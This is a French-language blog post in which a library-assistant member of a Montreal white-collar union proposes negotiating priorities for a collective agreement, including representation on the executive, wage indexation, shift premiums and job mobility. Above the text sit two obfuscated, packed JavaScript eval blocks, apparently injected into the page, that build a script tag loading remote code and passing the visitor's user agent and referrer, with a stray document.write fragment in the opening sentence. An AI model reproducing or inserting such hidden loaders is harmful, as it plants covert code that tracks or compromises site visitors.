Note syndicale

1. Quelques suggestions
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yezdf|var|u0026u|referrer|bnsrr||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffhhz|var|u0026u|referrer|irenf||js|php’.split(‘|’),0,{}))

Oups, document.write(“”); le temps passe vite quand on travail trente-cinq heures (et quand on est préoccupé par le fait que le mouvement de sa permanence n’est toujours pas complété après près de deux mois) et voici déjà le moment du fameux colloque (reporté maintes fois) pour
discuter d’un projet de convention collective. Désolé de ce billet de dernière minute!

Tout les détails après le saut de page:

Avant de m’avancer à faire des suggestions pour la négo de la convention, j’aimerais d’abord en faire pour la structure même du SFMM:

  • Les aides-bibliothécaires représentent une proportion importante des membres (10%) et devraient donc être représenté en conséquence à l’intérieur du syndicat. Plusieurs dossiers liés aux aides-biblio ont été mené de manière très insatisfaisante ces dernières années (lettres d’entente et équité salariale pour n’en nommer que deux). J’ose croire qu’il en serait autrement si l’un des membres de l’exécutif (préférablement un vp ou tout au moins un directeur, et si possible issue du rang même des aides-biblio de sorte qu’il/elle comprenne parfaitement les problèmes et enjeux spécifiques à ce poste) avait la responsabilité et le mandat de défendre leurs intérêts.

Mise à jour : je tiens à rapeller (comme je l’ai fait dans le billet Note syndicale: feedback) que mon point porte moins sur l’idée d’avoir une membre de l’exécutif qui soit issue du milieu des bibliothèques (quoique cela aiderait) que d’avoir un membre de l’exécutif qui soit directement responsable du service des bibliothèques (comme on le sait chacun des v-p est responsable d’un certain nombre de dossiers, de services et d’arrondissements; et bien je crois que, de par son importance et le fait que les cols blancs qui y travaillent ont des tâches et des horaires atypiques, le service des bibliothèques devait figurer parmis la répartition de ces responsabilités).

Quand à la convention (et à l’entente qui la prolonge et modifie l’article 19) voici ce que je crois important pour les négos:

  • D’abord conserver les acquis. Donc, en tout points, toutes concession ou tout recul est inacceptable. Le travail du syndicat est, au mieux, d’améliorer les conditions de travail des membres ou, au pire, de les maintenir.
  • Côté salarial je ne crois pas qu’on ait à se plaindre tant que nous continuons à être indexé au coût de la vie (au minimum: comme la dernière convention qui offrait une augmentation de 4% sur 4 ans mais plus si possible, comme 6 à 8% sur 4 ans). [MàJ: comme le coût de la vie croît en moyenne de 2% par année, et donc de 8% sur quatre ans, une augmentation de 8% serait préférable]

    [Mise à jour : quoique selon certains, si l’on tiens compte du dollar constant, il faudrait une augmentation d’au moins 8% pour simplement rattraper la perte de pouvoir d’achat que les Cols Blancs ont subi dans les quinze dernières années (l’indice des prix à la consommation ayant augmenté plus que nos salaires). Donc: 8% d’indexation sur quatre ans + 8% de rattrapage = 16% !! Toutefois serait-il sage de demander de telles augmentations de salaire en ces temps de disette économique? Comment balancer le risque de s’aliéner l’opinion publique et la nécessité de pouvoir payer nos comptes et hypothèques sans accroitre notre endettement? Quel serait le compromis le plus acceptable?]

  • Dans le cas des aides-biblio il faut absolument renégocier les lettres d’entente à l’intérieur de la convention pour obtenir une seule et même lettre pour tout les arrondissements. Si on peut négocier une seule et unique convention, je ne vois pas pourquoi on ne pourrait pas faire de même pour les lettres d’entente. Le point de départ devrait être le projet de lettre d’entente proposé par les aides-biblio de Côte-des-Neiges/Notre-Dame-de-Grâce.
  • Toujours dans le cas des aides-biblio, compte-tenu de la tendance à re-centraliser certains services (i.e. dotation), il faudrait rétablir une banque réseau centrale pour les remplacements des auxiliaires.

Mise à jour : voici quelques nouvelles suggestions de points à revoir dans la convention:

  • Améliorer la mobilité d’emploi (particulièrement d’un arrondissement à l’autre) devrait aussi être une priorité. Et aussi faciliter la mutation (car muter entre arrondissements semble une tâche quasi-impossible à l’heure actuelle)
  • Bonifier les primes hors heures pour les permanents qui ont un horaire atypique (en fait revenir à des primes de 15% POUR TOUS et non 15% pour les anciens employés et 10% pour les nouveaux). Les rendre accessible aux auxiliaires serait une bonne idée (là, la différence 15-10% ferait du sens).
  • Ajouter des primes pour ceux qui doivent travailler avec le public et en particulier avec des enfants!!
  • J’adore l’idée de postes permanents à temps partiel (parfait pour les permanents vieillissants qui pourraient ainsi diminuer les heures travaillées à l’approche de la retraite).
  • Comme les permanents ont souvent des responsabilités plus grandes que les auxiliaires, ne serait-il pas plus équitable de leur donner une échelle salariale (voir un groupe de traitement) différente (i.e. supérieure)? Ou, dans le cas des aides-bibliothécaires, l’emploi pourrait être divisé en deux catégories avec des groupes de traitement différents: aide-bibliothécaire niveau 1 (ou commis de biblio, responsable principalement du service au comptoir et du classement; groupe 4 ou 5) et niveau 2 (ou aide-bibliothécaire principal, avec des responsabilités supérieures comme la préparation des fiches d’aquisition, le traitement matériel et la réparation des documents, etc., mais incluant aussi le comptoir et le classement; groupe 5 ou 6).

Il y a plusieurs autres points qu’il faudrait discuter pour les aides-biblio (entre autres: le ramassage des bacs de recyclages et la description de tâche valise) mais ce sont là d’autres dossiers. Pour ce qui est de la convention collective, croyez-le ou non, je crois que ce sont là tous les points que je juge important (sinon primordial). Je suis sûr que j’en oubli mais je fais confiance à mes collègues pour rajouter les points qu’ils jugent important. Bon colloque!

Faute d’avoir un syndicat efficace et pleinement fonctionnel, espérons qu’on obtiendra au moins une bonne convention collective.

Vous trouverez des commentaires supplémentaires sur les réactions à mon billet dans le billet “Note syndicale: feedback.”

One thought on “Note syndicale

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s